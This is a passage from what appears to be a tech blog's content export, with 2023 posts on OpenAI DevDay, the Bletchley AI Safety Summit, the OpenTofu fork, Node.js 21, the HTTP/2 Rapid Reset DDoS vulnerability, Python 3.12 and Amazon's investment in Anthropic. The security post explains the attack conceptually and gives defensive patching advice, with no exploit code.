the 80% case with dramatically less code.\nThis is a classic platform play. OpenAI is moving up the stack from \u0026ldquo;model provider\u0026rdquo; to \u0026ldquo;application platform,\u0026rdquo; absorbing functionality that was previously the domain of middleware libraries and startups. 
I\u0026rsquo;ve seen this pattern before — AWS did it with managed services that replaced open-source tools, and it\u0026rsquo;s always a double-edged sword for the ecosystem.\nCustom GPTs and the GPT Store # The custom GPTs feature lets anyone create a specialized ChatGPT variant by providing instructions, knowledge files, and selecting capabilities — no coding required. OpenAI announced a GPT Store launching later this month where creators can publish and monetize their GPTs.\nThis is interesting from a product perspective, but I\u0026rsquo;m skeptical about the long-term value proposition. The barrier to creating a custom GPT is so low that differentiation will be nearly impossible. We\u0026rsquo;ve seen this movie before with app stores — the initial gold rush gives way to a crowded marketplace where discovery is the primary challenge. When the GPT Store eventually launched, many of these dynamics played out as predicted.\nFor professional developers, the more relevant angle is the Actions system that lets custom GPTs call external APIs. This effectively turns every GPT into a potential integration point with your existing services. If your product has an API, someone will build a GPT wrapper around it. Whether that\u0026rsquo;s an opportunity or a threat depends on your business model.\nJSON Mode and Reproducible Outputs # A smaller but deeply practical announcement: GPT-4 Turbo now supports a JSON mode that guarantees valid JSON output, and a seed parameter for reproducible outputs. For anyone who\u0026rsquo;s written fragile regex parsing to extract structured data from LLM responses, or built retry loops to handle malformed JSON, this is a genuine quality-of-life improvement.\nThe seed parameter for reproducible outputs is particularly valuable for testing. One of the biggest challenges in building LLM-powered features has been the non-deterministic nature of the outputs — making it nearly impossible to write reliable integration tests. 
With consistent seeded outputs, we can finally build proper regression test suites.\nMy Take # DevDay crystallized something I\u0026rsquo;ve been sensing for months: OpenAI is no longer just an AI research lab that happens to have an API. It\u0026rsquo;s becoming a developer platform company, and it\u0026rsquo;s doing so with the kind of speed and ambition that should make both competitors and ecosystem partners nervous.\nThe strategic calculus for development teams has shifted. Building custom orchestration and RAG infrastructure still makes sense for complex, differentiated use cases. But for straightforward AI integration — chatbots, document analysis, code assistance — the build-vs-buy equation now strongly favors OpenAI\u0026rsquo;s managed offerings.\nMy concern is vendor lock-in. Every feature that OpenAI absorbs into their platform is another dependency that\u0026rsquo;s difficult to migrate away from. If you\u0026rsquo;re building on the Assistants API and OpenAI changes pricing, policies, or capabilities, your options are limited. I\u0026rsquo;d recommend maintaining abstraction layers and keeping an eye on open-source alternatives like Mistral and Llama 2 that are closing the capability gap.\nDevDay was impressive. It was also a reminder that in the AI platform war, the pace of change is unlike anything I\u0026rsquo;ve seen in three decades of software development. 
The accessibility of the ChatGPT API democratized AI integration, and now OpenAI is systematically building managed services to capture more of the AI application stack.\n","date":"9 November 2023","externalUrl":null,"permalink":"/posts/231109-openai-devday-gpt4-turbo/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"OpenAI’s DevDay unveils GPT-4 Turbo, custom GPTs, and the Assistants API — signaling a major shift from model provider to developer platform.","title":"OpenAI DevDay — GPT-4 Turbo and the Platform Play","type":"posts"},{"content":"Yesterday and today, representatives from 28 countries gathered at Bletchley Park — the historic home of World War II codebreaking — to discuss something that would have seemed like science fiction to Alan Turing and his colleagues: how to govern artificial intelligence that\u0026rsquo;s rapidly approaching capabilities we barely understand. The symbolism of the venue isn\u0026rsquo;t lost on anyone in the tech community.\nThe UK AI Safety Summit is the first major international gathering specifically focused on the risks posed by frontier AI systems. And regardless of where you stand on AI doomerism versus techno-optimism, the fact that this conversation is happening at a governmental level matters enormously for those of us building software.\nThe Bletchley Declaration # The headline outcome is the Bletchley Declaration, signed by all 28 participating countries, including the US and China, together with the European Union. It acknowledges that advanced AI systems pose potentially catastrophic risks and commits signatories to international cooperation on AI safety. 
China\u0026rsquo;s presence at the table is particularly noteworthy — getting Beijing and Washington to agree on anything technology-related these days is an achievement in itself.\nThe declaration identifies several risk categories: misuse of AI for cyberattacks and bioweapons, loss of control over autonomous systems, and societal-scale disruption. For developers, the important takeaway is that this isn\u0026rsquo;t just about hypothetical superintelligence scenarios. The declaration explicitly mentions current-generation risks — things like AI-generated disinformation, automated vulnerability discovery, and the amplification of existing biases at scale.\nWhat This Means for AI Development Teams # If you\u0026rsquo;re leading a team that\u0026rsquo;s integrating LLMs or other AI capabilities into production systems, this summit should be on your radar for several practical reasons.\nFirst, regulation is coming, and it\u0026rsquo;s going to be international. The EU AI Act is already well advanced, the Biden administration issued its Executive Order on AI just days ago, and now we have a multilateral framework forming. The direction of travel is clear: if you\u0026rsquo;re deploying AI systems, you\u0026rsquo;ll need to demonstrate safety testing, maintain audit trails, and potentially submit to external evaluation — especially for high-risk applications.\nSecond, the summit established the UK AI Safety Institute, a government body dedicated to evaluating frontier AI models before and after deployment. This is a template that other nations will likely replicate. The practical implication? Model providers will face increasing pressure to allow third-party safety testing, which could affect API availability, model access, and the speed at which new capabilities reach developers.\nThird, and perhaps most importantly for day-to-day development work, the emphasis on responsible AI development practices is going to filter down into enterprise procurement requirements. 
I\u0026rsquo;ve already seen RFP documents asking about AI governance frameworks. This trend will accelerate.\nThe Technical Community\u0026rsquo;s Mixed Reaction # The reaction from the AI research and development community has been predictably divided. On one side, researchers at organizations like the Centre for AI Safety see this as long overdue recognition that the risks are real and require coordinated action. On the other, many practitioners worry that premature regulation could stifle innovation and hand advantages to less scrupulous actors.\nI think both perspectives have merit. Having spent decades watching technology regulation cycles, I can say that governments almost never get the technical details right on the first pass. The EU\u0026rsquo;s cookie consent disaster is a prime example — well-intentioned regulation that created a worse user experience without meaningfully improving privacy. The risk of similar outcomes with AI regulation is real.\nBut the alternative — no governance framework at all — isn\u0026rsquo;t viable either. The capabilities emerging from frontier labs are genuinely unprecedented, and the \u0026ldquo;move fast and break things\u0026rdquo; philosophy becomes considerably less appealing when the things being broken could be critical infrastructure or democratic processes.\nMy Take # What strikes me most about the Bletchley Park summit is the speed at which we\u0026rsquo;ve moved from \u0026ldquo;should we regulate AI?\u0026rdquo; to \u0026ldquo;how do we regulate AI internationally?\u0026rdquo; Twelve months ago, ChatGPT had just launched and most policymakers couldn\u0026rsquo;t articulate what a large language model was. Now we have a multilateral declaration and a new government institution dedicated to AI safety.\nFor those of us in the trenches — building systems, integrating models, shipping features — the practical advice is straightforward: start building governance into your AI development processes now. 
Document your model choices, maintain evaluation datasets, implement monitoring for model behavior in production, and establish clear escalation paths for when things go wrong. This isn\u0026rsquo;t just good engineering practice; it\u0026rsquo;s preparing for the regulatory landscape that\u0026rsquo;s clearly forming.\nThe summit at Bletchley Park won\u0026rsquo;t change your sprint backlog tomorrow. But the trajectory it represents will reshape how we build and deploy AI systems over the coming years. Better to be ahead of that curve than scrambling to catch up.\n","date":"2 November 2023","externalUrl":null,"permalink":"/posts/231102-bletchley-park-ai-safety-summit/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The UK’s AI Safety Summit at Bletchley Park brings 28 nations together to discuss AI risks, marking a watershed moment for international AI governance.","title":"Bletchley Park AI Safety Summit — Governments Finally Enter the Chat","type":"posts"},{"content":"It\u0026rsquo;s been roughly two months since HashiCorp switched Terraform from the Mozilla Public License (MPL) to the Business Source License (BSL), and the community response has crystallised into something real: OpenTofu. What started as an open letter and a manifesto has become a Linux Foundation project with significant backing, active development, and its first alpha releases. The question is no longer \u0026ldquo;will there be a fork?\u0026rdquo; but \u0026ldquo;how will the fork and the original coexist?\u0026rdquo;\nThe Backstory, Briefly # In August, HashiCorp announced that all future releases of Terraform (and other HashiCorp products) would be under the BSL 1.1 license. The BSL allows most use cases but restricts using the software to create competing products or services. For many users, nothing changed practically. 
But for companies building managed Terraform services, CI/CD platforms with Terraform integration, or consulting businesses, the implications were significant.\nThe response was swift. Within days, a coalition of companies and individual contributors launched the OpenTF manifesto, calling for Terraform to remain truly open source. When HashiCorp didn\u0026rsquo;t reverse course, the fork was announced. In September, the Linux Foundation formally adopted the project, renaming it OpenTofu to avoid trademark issues.\nWhere OpenTofu Stands Today # OpenTofu has released its first alpha versions, tracking closely with Terraform 1.6. The project\u0026rsquo;s initial goal is straightforward: maintain compatibility with existing Terraform configurations while establishing an independent development path under a genuinely open-source license (MPL 2.0).\nThe OpenTofu repository is active, with contributions from engineers at Spacelift, Env0, Gruntwork, and other infrastructure companies. The steering committee includes representatives from several organisations, which helps prevent any single company from controlling the project\u0026rsquo;s direction.\nFrom a practical standpoint, the current alpha is largely a drop-in replacement. You can point it at existing Terraform state files and configurations. The registry compatibility work is progressing, with OpenTofu setting up its own provider and module registry while maintaining compatibility with the existing ecosystem.\nThe Technical Divergence Question # The most interesting question right now is how quickly OpenTofu will diverge from Terraform. In the short term, maintaining compatibility is essential — nobody wants to rewrite their infrastructure code. But over time, independent governance means independent technical decisions.\nSome areas where divergence might occur:\nState management: Terraform\u0026rsquo;s state handling has always been a pain point. 
Remote state, state locking, state migration — these are areas where significant improvements are possible. An open-source project with multiple commercial backers might be more willing to make breaking changes in state management if the community consensus supports it.\nProvider ecosystem: Both Terraform and OpenTofu use the same provider protocol, so existing providers work with both. But new providers could theoretically be developed exclusively for one or the other. The OpenTofu registry is being built to remain compatible, but the long-term evolution is uncertain.\nLanguage features: HashiCorp has been conservative with HCL evolution. An independent OpenTofu could potentially move faster on language features — better loops, first-class functions, improved module system — if the community demands it. This mirrors what we\u0026rsquo;ve seen with other open-source relicensing crises.\nPersonally, I think we\u0026rsquo;re looking at a period of compatibility lasting at least a year, possibly longer. The OpenTofu team is smart enough to know that forcing users to choose too early would be counterproductive.\nWhat This Means for Your Infrastructure # If you\u0026rsquo;re using Terraform in production today, don\u0026rsquo;t panic. Nothing requires immediate action. HashiCorp isn\u0026rsquo;t going to stop maintaining Terraform — if anything, the competition will motivate them to ship faster.\nHere\u0026rsquo;s my practical advice:\nKeep your configurations standard. Stick to well-documented HCL patterns and avoid relying on undocumented behaviour. This gives you maximum flexibility to switch between Terraform and OpenTofu if needed.\nWatch the registry situation. Providers and modules are the ecosystem\u0026rsquo;s lifeblood. If your critical providers are well-maintained by their original vendors (AWS, Azure, Google Cloud, etc.), they\u0026rsquo;ll likely support both tools. 
Niche providers might take longer to explicitly support OpenTofu.\nTest OpenTofu in non-production environments. It\u0026rsquo;s alpha quality right now, but testing it against your configurations helps you understand the compatibility story and provides valuable feedback to the project.\nDon\u0026rsquo;t rewrite anything yet. If your Terraform setup works, keep it working. The time for potentially switching is when OpenTofu reaches a stable 1.0 release and your team has had time to evaluate it properly.\nThe Broader Open Source Lesson # This saga is a case study in open-source sustainability tensions. HashiCorp built an incredible product and gave it away under an open license. Other companies built profitable businesses on top of that product. HashiCorp decided the value exchange was unfair and changed the license. The community decided the license change was unacceptable and forked.\nEveryone involved has a legitimate point. HashiCorp invested hundreds of millions in R\u0026amp;D and watched competitors monetise their work. The community invested time, plugins, modules, and expertise into an ecosystem that was promised to be open source. There\u0026rsquo;s no clean villain here.\nWhat I find encouraging is that the Linux Foundation stepped in quickly and gave OpenTofu institutional backing. Open-source projects need governance, funding, and legal support to survive long-term. A passionate community without institutional support tends to fragment. OpenTofu has both, which gives it a real chance.\nMy Take # I\u0026rsquo;ve managed infrastructure with Terraform since the early 0.x days, and it transformed how I think about infrastructure provisioning. Whatever happens with the fork, Terraform\u0026rsquo;s impact on the industry is undeniable.\nMy bet is that both Terraform and OpenTofu will coexist for the foreseeable future, similar to how MySQL and MariaDB, or Elasticsearch and OpenSearch have settled into parallel existence. 
The market is big enough for both, and competition drives innovation.\nFor now, I\u0026rsquo;m keeping Terraform in production and running OpenTofu in a test environment. The alpha is promising, and the pace of development suggests a stable release isn\u0026rsquo;t too far off. When it arrives, I\u0026rsquo;ll evaluate the switch more seriously.\nThe infrastructure-as-code ecosystem is healthier with genuine competition, and that\u0026rsquo;s ultimately what we\u0026rsquo;ve gained from this situation, messy as the journey has been.\n","date":"26 October 2023","externalUrl":null,"permalink":"/posts/231026-opentofu-terraform-fork/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"OpenTofu, the community fork of Terraform born from HashiCorp’s license change, is rapidly building momentum under the Linux Foundation.","title":"OpenTofu Gains Momentum — The Terraform Fork Finding Its Feet","type":"posts"},{"content":"Node.js 21 was released on October 17th, continuing the project\u0026rsquo;s steady six-month cadence for major releases. While odd-numbered releases don\u0026rsquo;t become LTS (that honour goes to the even-numbered ones — Node.js 20 entered LTS this same week), they serve as the proving ground for features that will eventually land in the next LTS line.\nSo what does Node.js 21 bring to the table, and why should you care even if you\u0026rsquo;re firmly planted on an LTS release?\nBuilt-in WebSocket Client # The headline feature is a built-in, browser-compatible WebSocket client. In Node.js 21 it is still experimental and has to be enabled with the --experimental-websocket flag, but it marks a significant step toward making WebSocket a proper first-class citizen.\nFor years, the Node.js ecosystem has relied on packages like ws, socket.io, and others for WebSocket functionality. 
These libraries are excellent and aren\u0026rsquo;t going anywhere, but having a built-in WebSocket global that aligns with the browser API is a meaningful step toward runtime compatibility.\nconst ws = new WebSocket(\u0026#39;wss://example.com/socket\u0026#39;); ws.addEventListener(\u0026#39;open\u0026#39;, () =\u0026gt; { ws.send(\u0026#39;Hello from Node.js 21\u0026#39;); }); ws.addEventListener(\u0026#39;message\u0026#39;, (event) =\u0026gt; { console.log(\u0026#39;Received:\u0026#39;, event.data); }); If you write code that needs to run in both browser and server contexts, this is a genuine quality-of-life improvement. With the --experimental-websocket flag enabled, the same WebSocket code works without conditional imports or polyfills. It\u0026rsquo;s part of a broader trend in Node.js toward implementing Web Platform APIs — fetch, WebCrypto, structuredClone, and now WebSocket.\nI\u0026rsquo;ve been advocating for this kind of convergence for years. The artificial barrier between \u0026ldquo;browser JavaScript\u0026rdquo; and \u0026ldquo;server JavaScript\u0026rdquo; has been a source of unnecessary complexity, and watching it gradually dissolve is satisfying.\nV8 11.8 and What It Brings # Node.js 21 ships with V8 11.8, which brings several improvements from the JavaScript engine side. ArrayBuffer.prototype.transfer() is now available, which is particularly relevant for performance-sensitive applications that work with binary data.\nArray grouping with Object.groupBy() and Map.groupBy() is also now available. 
This has been a long time coming — it\u0026rsquo;s one of those utility functions that every project implements differently:\nconst inventory = [ { name: \u0026#39;asparagus\u0026#39;, type: \u0026#39;vegetable\u0026#39; }, { name: \u0026#39;banana\u0026#39;, type: \u0026#39;fruit\u0026#39; }, { name: \u0026#39;carrot\u0026#39;, type: \u0026#39;vegetable\u0026#39; }, ]; const grouped = Object.groupBy(inventory, (item) =\u0026gt; item.type); // { vegetable: [...], fruit: [...] } Lodash\u0026rsquo;s groupBy has been one of the most imported functions in the Node.js ecosystem for a decade. Having a native equivalent reduces bundle size and dependency count for a lot of projects.\nThe --experimental-default-type Flag # Node.js 21 introduces the --experimental-default-type flag, allowing you to set the default module system for .js files to ESM. As the name says, it is still experimental. This continues the long, sometimes painful migration from CommonJS to ES modules.\nThe ESM transition in Node.js has been one of the more contentious journeys in the JavaScript ecosystem. It\u0026rsquo;s been years of dual-format packages, conditional exports, .mjs extensions, and \u0026quot;type\u0026quot;: \u0026quot;module\u0026quot; in package.json. Every release chips away at the friction, but we\u0026rsquo;re still not at the point where ESM \u0026ldquo;just works\u0026rdquo; in all scenarios.\nThis flag helps by letting you run an entire project as ESM without modifying package.json or renaming files. It\u0026rsquo;s particularly useful for quick scripts and prototyping where the ceremony of ESM configuration feels heavy.\nTest Runner Improvements # The built-in test runner (node:test) continues to mature. In Node.js 21, the runner accepts glob patterns for specifying test files, and there are improvements to the assertion library.\nI\u0026rsquo;ve been watching the built-in test runner with interest since it was introduced. 
Jest and Vitest dominate the testing landscape, but having a zero-dependency test runner built into the runtime has clear advantages for certain use cases — particularly CI/CD pipelines where minimising install time matters, or for library authors who want to avoid testing framework dependencies.\nimport { describe, it } from \u0026#39;node:test\u0026#39;; import assert from \u0026#39;node:assert\u0026#39;; describe(\u0026#39;Array\u0026#39;, () =\u0026gt; { it(\u0026#39;should return -1 when value is not present\u0026#39;, () =\u0026gt; { assert.strictEqual([1, 2, 3].indexOf(4), -1); }); }); The built-in runner isn\u0026rsquo;t going to replace Jest for complex applications with snapshot testing and mocking needs, but for straightforward test suites, it\u0026rsquo;s increasingly capable.\nThe LTS Transition Context # What makes this release cycle interesting is the timing. Node.js 20 simultaneously entered Active LTS status, which means it\u0026rsquo;s now the recommended version for production deployments. Node.js 21 is \u0026ldquo;Current\u0026rdquo; — it gets the latest features but only has a short support window.\nFor production systems, stick with Node.js 20 LTS. But if you\u0026rsquo;re starting new projects or maintaining libraries, testing against Node.js 21 now means fewer surprises when Node.js 22 arrives next year and eventually becomes LTS.\nMy advice for teams: set up your CI matrix to test against both the current LTS and the latest Current release. It\u0026rsquo;s minimal effort and catches compatibility issues months before they become urgent.\nMy Take # Node.js 21 isn\u0026rsquo;t a revolutionary release, but it\u0026rsquo;s a solid evolutionary one. The built-in WebSocket client, continued Web Platform API alignment, and V8 improvements all point in the right direction.\nWhat I find most encouraging is the project\u0026rsquo;s commitment to reducing the gap between server-side and client-side JavaScript. 
Every time Node.js implements another Web Platform API natively, it reduces the need for polyfills, simplifies isomorphic code, and makes the JavaScript ecosystem more coherent.\nThe runtime landscape is more competitive than ever — Deno and Bun are pushing the envelope in different ways — and that competition is clearly driving Node.js to iterate faster and adopt standards more aggressively. That\u0026rsquo;s healthy for everyone who writes JavaScript.\nIf you\u0026rsquo;re on Node.js 18 LTS, plan your upgrade to 20 LTS. If you\u0026rsquo;re already on 20, try 21 in your development environment and CI. And keep building — the JavaScript runtime ecosystem has never been more capable.\n","date":"19 October 2023","externalUrl":null,"permalink":"/posts/231019-nodejs-21-release/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Node.js 21 lands with a built-in WebSocket client, V8 11.8, and continued efforts to align the runtime with web platform standards.","title":"Node.js 21 Arrives — Built-in WebSocket Client and the Road to Stability","type":"posts"},{"content":"On October 10th, Google, Cloudflare, and Amazon Web Services jointly disclosed CVE-2023-44487, dubbed the \u0026ldquo;HTTP/2 Rapid Reset\u0026rdquo; attack. This isn\u0026rsquo;t your typical vulnerability announcement — it was actively exploited in the wild before disclosure, generating the largest DDoS attacks ever recorded. Google reported seeing attacks peaking at 398 million requests per second. Cloudflare recorded 201 million requests per second.\nLet those numbers sink in. Hundreds of millions of requests per second from relatively modest botnets. That\u0026rsquo;s the kind of amplification factor that changes the threat landscape.\nHow It Works # The vulnerability is elegant in its simplicity, which is what makes it so dangerous. 
It exploits a fundamental feature of the HTTP/2 protocol: stream multiplexing and the RST_STREAM frame.\nIn HTTP/2, a single TCP connection can carry multiple concurrent streams. A client opens a stream by sending a request, and can cancel that stream by sending a RST_STREAM frame. This is normal, expected behaviour — it\u0026rsquo;s how browsers cancel requests when you navigate away from a page, for example.\nThe attack works by rapidly opening new streams and immediately cancelling them with RST_STREAM. The key insight is that the server has to do work to process each stream — parsing headers, allocating resources, potentially hitting the application layer — but the client can cancel the stream before the server responds. The client never has to wait for or process responses, keeping its own resource usage minimal.\nBecause HTTP/2 servers typically allow hundreds of concurrent streams per connection, and because the RST_STREAM cancellation means the client never hits the concurrent stream limit (cancelled streams don\u0026rsquo;t count), an attacker can generate an enormous request rate with very little bandwidth.\nThis is fundamentally different from traditional HTTP flood attacks. With HTTP/1.1, each request-response cycle consumes resources on both sides. With this HTTP/2 exploitation, the asymmetry is heavily in the attacker\u0026rsquo;s favour, similar to how infrastructure dependencies create cascading failure scenarios.\nWhy This Is a Protocol-Level Problem # What makes CVE-2023-44487 particularly concerning is that it\u0026rsquo;s not a bug in any specific implementation — it\u0026rsquo;s a consequence of how the HTTP/2 protocol was designed. Every HTTP/2 server is potentially affected: nginx, Apache, IIS, Node.js, Go\u0026rsquo;s net/http, Envoy, HAProxy, and many more.\nEach implementation needs its own mitigation, and the fixes vary. Some servers now limit the rate of RST_STREAM frames. 
Others track the ratio of reset streams to completed streams and close connections that exceed a threshold. There\u0026rsquo;s no single patch that fixes everything.\nThis is reminiscent of other protocol-level issues we\u0026rsquo;ve seen over the years — slowloris attacks against HTTP/1.1, the TCP SYN flood, or more recently the various TLS renegotiation attacks. When the vulnerability is in the protocol design rather than the implementation, the fix is inherently messier.\nWhat You Need to Do # If you run any HTTP/2-facing infrastructure (and you almost certainly do), here\u0026rsquo;s the priority list:\n1. Patch your web servers and proxies. Nginx released patches, Cloudflare and AWS have mitigated on their platforms, and most major HTTP/2 implementations have issued updates. Check your specific stack.\n2. Review your load balancer and reverse proxy configurations. If you terminate HTTP/2 at a load balancer or CDN, make sure that layer is patched. If you\u0026rsquo;re behind Cloudflare, AWS CloudFront, or Google Cloud CDN, you\u0026rsquo;re likely already protected — but verify.\n3. Check your application servers. Even if you terminate HTTP/2 at a reverse proxy, some architectures pass HTTP/2 through to the application server. If your Node.js, Go, or Java application handles HTTP/2 directly, it needs to be updated.\n4. Monitor for unusual patterns. Look for connections with high stream reset rates. A legitimate client rarely opens and immediately cancels hundreds of streams. Implementing rate limiting on RST_STREAM frames at the connection level is a reasonable defensive measure.\n5. Consider your HTTP/2 settings. The SETTINGS_MAX_CONCURRENT_STREAMS parameter can limit exposure, though setting it too low affects legitimate performance. Finding the right balance depends on your traffic patterns.\nThe Bigger Picture # This vulnerability highlights a tension in protocol design that I\u0026rsquo;ve thought about for years. 
HTTP/2 was designed for performance — multiplexing, header compression, server push — and those features are genuinely valuable. But every new feature is a new attack surface, and the interaction between features (multiplexing + stream cancellation) can create unexpected vulnerabilities.\nWe\u0026rsquo;re seeing the same pattern with HTTP/3 and QUIC. More complexity means more potential for exploitation. I\u0026rsquo;m not saying we should stick with HTTP/1.1 forever — the performance benefits of modern protocols are real and important. But we need to be more rigorous about adversarial analysis during protocol design.\nThe coordinated disclosure between Google, Cloudflare, and AWS is a positive example of how the industry should handle these situations. These companies are competitors in almost every other dimension, but when it comes to protocol-level vulnerabilities, they recognised the need to work together. The attacks were being observed in August and September, and the coordinated response gave major infrastructure providers time to deploy mitigations before the public disclosure.\nMy Take # In my thirty years in this industry, I\u0026rsquo;ve seen plenty of \u0026ldquo;record-breaking\u0026rdquo; DDoS attacks. What makes this one different is the efficiency of the attack. You don\u0026rsquo;t need a massive botnet — the protocol amplification does the heavy lifting. That lowers the barrier for attackers significantly.\nIf you haven\u0026rsquo;t patched yet, do it today. Not tomorrow, not next sprint — today. The attack is already being used in the wild, the technique is now public knowledge, and exploitation tools will only proliferate.\nThe silver lining is that this is fixable at the implementation level, even if the underlying protocol design is the root cause. Rate limiting RST_STREAM frames is a reasonable mitigation that doesn\u0026rsquo;t significantly impact legitimate traffic. 
But it requires action from everyone running HTTP/2 infrastructure, which is essentially everyone running a web service in 2023.\nStay safe out there. Patch your servers, watch your traffic, and remember: the protocols we rely on are only as secure as their most creative adversarial analysis.\n","date":"12 October 2023","externalUrl":null,"permalink":"/posts/231012-http2-rapid-reset-attack/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"CVE-2023-44487 exploits a fundamental aspect of HTTP/2 to enable record-breaking DDoS attacks. Here’s what you need to know and do.","title":"HTTP/2 Rapid Reset — The Zero-Day That Hit Everyone","type":"posts"},{"content":"Python 3.12 was officially released on October 2nd, and after spending a few days putting it through its paces, I think this is one of the most practically impactful releases in recent memory. Not because of any single headline feature, but because the cumulative improvements address real pain points that Python developers deal with every day.\nThe release notes are extensive, but let me focus on what actually matters for working developers.\nPerformance: The Steady March Forward # The CPython team has continued the performance work that started with the Faster CPython project initiated by Mark Shannon and backed by Microsoft. Python 3.12 delivers another round of improvements, building on the gains from 3.11.\nThe comprehension inlining optimisation is a nice touch — list comprehensions no longer create a separate frame, which reduces overhead. It\u0026rsquo;s the kind of change that doesn\u0026rsquo;t sound dramatic but adds up across a codebase that leans heavily on Pythonic idioms.\nMore significantly, the work on the specialising adaptive interpreter continues. 
The interpreter now handles more bytecode patterns efficiently, and the startup time improvements are noticeable if you\u0026rsquo;re running lots of short-lived Python processes — think CLI tools, serverless functions, or test suites.\nI ran some informal benchmarks on a data processing pipeline I maintain, and saw roughly 5-8% improvement over 3.11 without changing any code. Your mileage will vary, but free performance is free performance.\nPer-Interpreter GIL: Laying the Groundwork # This is the feature that has the most long-term significance, even though most developers won\u0026rsquo;t use it directly yet. Python 3.12 introduces a per-interpreter GIL through PEP 684.\nFor those unfamiliar with the pain: Python\u0026rsquo;s Global Interpreter Lock (GIL) has been the bane of CPU-bound multithreaded code for decades. The per-interpreter GIL means that separate sub-interpreters can now run truly in parallel, each with its own lock.\nThe caveat is that this is primarily a C-API feature right now. There\u0026rsquo;s no convenient Python-level API for sub-interpreters with separate GILs yet — that\u0026rsquo;s expected to come in future releases. But the foundation is being laid, and it\u0026rsquo;s being laid carefully, which I appreciate.\nHaving worked with Python\u0026rsquo;s threading limitations since the late 1990s, I can say that the approach the core team is taking — incremental, backward-compatible, carefully tested — is exactly right. The GIL can\u0026rsquo;t be ripped out overnight without breaking half the C extension ecosystem.\nBetter Error Messages Continue to Shine # Python 3.11 made a huge leap in error message quality, and 3.12 continues the trend. The improvements to NameError suggestions are particularly welcome: Python now draws hints from a broader context, such as a standard library module you forgot to import or an instance attribute that is missing its self. prefix.\nThe improved SyntaxError messages for common mistakes are also excellent. 
I\u0026rsquo;ve watched junior developers on my teams spend twenty minutes debugging what turns out to be a missing colon or an incorrect indentation. Every improvement in error messaging directly translates to developer productivity.\nThis might seem like a small thing compared to performance numbers, but I\u0026rsquo;d argue it\u0026rsquo;s one of the most impactful changes for the community. Python\u0026rsquo;s role as a teaching language and as a first language for many developers makes error message quality a genuine strategic feature.\nType Parameter Syntax (PEP 695) # The new type parameter syntax is a significant quality-of-life improvement for anyone using Python\u0026rsquo;s type system. Instead of the somewhat awkward TypeVar approach:\nfrom typing import TypeVar T = TypeVar(\u0026#39;T\u0026#39;) def first(items: list[T]) -\u0026gt; T: return items[0] You can now write:\ndef first[T](items: list[T]) -\u0026gt; T: return items[0] This brings Python\u0026rsquo;s generic syntax closer to what developers expect if they\u0026rsquo;ve used generics in TypeScript, Java, or C#. The type statement for type aliases is similarly clean:\ntype Vector = list[float] type Matrix[T] = list[list[T]] I\u0026rsquo;ve been a gradual convert to Python\u0026rsquo;s type system over the past few years. It\u0026rsquo;s not perfect, and runtime enforcement is still largely absent without third-party tools, but for documentation, IDE support, and catching bugs early with mypy or pyright, it\u0026rsquo;s become indispensable on larger codebases. PEP 695 removes one of the last rough edges.\nRemoved Deprecated Modules # Python 3.12 removes a batch of long-deprecated modules including distutils, asynchat, asyncore, and several others. The distutils removal is the one most likely to bite people — if you have old setup.py files that import from distutils, it\u0026rsquo;s time to migrate to setuptools or another modern build backend.\nThis is healthy housekeeping. 
Python\u0026rsquo;s standard library has accumulated cruft over the decades, and clearing it out reduces maintenance burden and confusion for newcomers.\nMy Take # Python 3.12 is a solid release that continues the trajectory the core team has been on: faster runtime, better developer experience, and a more capable type system. There\u0026rsquo;s no single \u0026ldquo;must upgrade immediately\u0026rdquo; feature, but the cumulative effect is compelling.\nMy recommendation: start testing your projects against 3.12 now. If you\u0026rsquo;re still on 3.9 or 3.10, consider skipping straight to 3.12 — the performance improvements alone justify the effort, and the error message improvements will make your whole team more productive.\nThe per-interpreter GIL work is the one to watch for future releases. If the Python team can deliver a usable API for true parallelism in 3.13 or 3.14, it could fundamentally change how we think about Python for CPU-bound workloads. For now, it\u0026rsquo;s a promising foundation.\nPython continues to be the language that meets you where you are. And with 3.12, it meets you a little faster and with better error messages when you take a wrong turn.\n","date":"5 October 2023","externalUrl":null,"permalink":"/posts/231005-python-312-release/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Python 3.12 arrives with significant performance improvements, better error messages, and a new type system feature that changes how we write Python.","title":"Python 3.12 Is Here — Performance, Developer Experience, and What Matters","type":"posts"},{"content":"This week Amazon announced it\u0026rsquo;s investing up to $4 billion in Anthropic, the AI safety startup behind the Claude family of large language models. 
It\u0026rsquo;s the largest outside investment Amazon has ever made, and it firmly establishes a pattern we\u0026rsquo;ve been watching unfold all year: the major cloud providers are going all-in on AI partnerships rather than purely building in-house.\nIf you\u0026rsquo;ve been keeping score, Microsoft has OpenAI, Google has a separate deal with Anthropic (and its own DeepMind), and now Amazon has cemented its relationship with Anthropic as well. The chess pieces on the AI board are being placed with remarkable speed.\nThe Cloud Infrastructure Play # What makes this investment particularly interesting from an infrastructure perspective is the commitment that Anthropic will use Amazon Web Services as its primary cloud provider. This isn\u0026rsquo;t just a financial investment — it\u0026rsquo;s a strategic lock-in that ensures some of the most demanding AI workloads in the world will run on AWS.\nTraining large language models requires enormous compute resources. We\u0026rsquo;re talking thousands of GPUs running for weeks or months. When Anthropic runs those workloads on AWS, it pushes Amazon to improve its AI-specific infrastructure — custom chips like Trainium and Inferentia, networking optimisation, storage throughput — in ways that benefit every AWS customer.\nI\u0026rsquo;ve spent enough years working with cloud infrastructure to recognise this pattern. When a cloud provider has a marquee customer pushing the boundaries of what\u0026rsquo;s possible, the improvements trickle down to everyone. Amazon\u0026rsquo;s investment in Anthropic is as much about making AWS the best platform for AI workloads as it is about owning a piece of the AI future.\nThe Model-as-a-Service Ecosystem # Amazon Bedrock, their managed service for foundation models, gets a significant boost from this deal. 
